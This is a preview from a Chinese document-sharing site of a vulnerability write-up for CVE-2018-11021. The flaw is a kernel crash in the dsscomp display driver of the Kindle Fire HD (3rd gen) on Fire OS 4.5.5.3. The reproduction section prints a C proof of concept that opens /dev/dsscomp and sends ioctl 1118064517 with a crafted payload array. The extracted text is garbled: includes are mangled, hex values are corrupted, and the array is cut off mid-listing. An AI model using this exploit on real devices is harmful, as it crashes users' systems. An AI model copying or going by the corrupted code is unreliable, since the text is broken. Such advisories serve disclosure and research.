(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
《(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(3页珍藏版)》请在第壹文秘上搜索。
1、(CVE-2018-11021) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 内核组件中的内核模块 omapdriversvideoomap2dsscompdevice.c 允许攻击者通过设备/ dev 上 ioctl 的参数注入特制参数/dsscomp与命令1118064517并导致内核崩溃。要探索此漏洞,必须打开设备文件/ dev/dsscomp,并使用命令Ill8064517和 精心设计的有效负载作为第三个参数在此设备文件上调用ioct
2、l系统调用。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc /* This is poc of Kindle Fire HD 3rd* A bug in the ioctl interface of device file devdsscomp causes the system crash via IOCTL 1118064517.* Related buggy struct name is dsscomp_setup_dispc_data.* This Poc should run with permission to do ioctl on devdsscomp.*/#in
3、clude #include ttinclude #include const static char *driver = ,devdsscomp;static command = 1118064517;int main(int argc, char *argv, char *env) unsigned int payload = 0xffffffff, 0X00000003j 05d200040, 079900008j 0x8f5928bd, 0x78b02422j 0X000000004 Oxffffffff, 0f4c50400,0x007fffff, 0x8499f562, 0ffff
4、0400, 0001bl31dj 060818210, 0x00000007, 0ffffffff, 0x00000000, 0x9da9041c 0xcd980400, 0x001f03f4, 0X00000007, 0x2a34003f, 0x7c80d8f3j 0x63102627, 0c73643a8, 0xa28f0665, 0X00000000, 0x689e57b4, 0x01ff0008, 0x5e7324bl, 0ae3b003f, 00bl74d86, 0x00000400, 0x2:Iffff37, 0ceb367a4j 0X00000040, 0X00000001, 0
5、xec000f9e, 0x00000001j 0000001ff, 0X00000000, 000000000, 0X0000000f, 0x0425c069, 0038cc3bej 00000000f, 000000080, 0e5790100, 0x5blbffffj 0x0000d355, 0x0000c685, 0xa0070000, 00010ffff, 000a0ff00, 0X00000001j 0ff490700, 00832ad03j 000000006, 000000002, 0X00000001 081f871c0, 0738019cb, 0bf47ffff, 0X000
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- CVE-2018-11021Amazon Kindle Fire HD 3rd OS kernel组件安全漏洞 CVE 2018 11021 Amazon rd kernel 组件 安全漏洞
链接地址:https://www.1wenmi.com/doc/493964.html